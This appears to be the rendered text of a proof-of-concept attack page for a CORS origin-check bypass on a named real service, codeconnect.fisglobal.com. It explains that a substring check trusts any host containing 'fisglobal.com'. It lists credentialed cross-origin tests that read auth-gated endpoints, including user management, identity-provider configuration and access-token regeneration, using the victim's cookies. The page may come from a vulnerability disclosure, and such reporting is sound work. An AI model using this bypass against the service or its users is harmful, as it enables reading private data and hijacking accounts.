FIS CodeConnect CORS Substring Bypass PoC

Attacker origin:

This page sends a credentialed cross-origin fetch to codeconnect.fisglobal.com. The substring CORS check accepts this origin because the hostname contains fisglobal.com, so the browser allows the response body to be read by attacker JS.

Test: unauth /user/regStatus oracle

running...

Test: auth-gated /idpconfig (sends victim cookies if logged in)

running...

Test: auth-gated /usermanagement

running...

Test: auth-gated /accesstokenregenerate (POST)

running...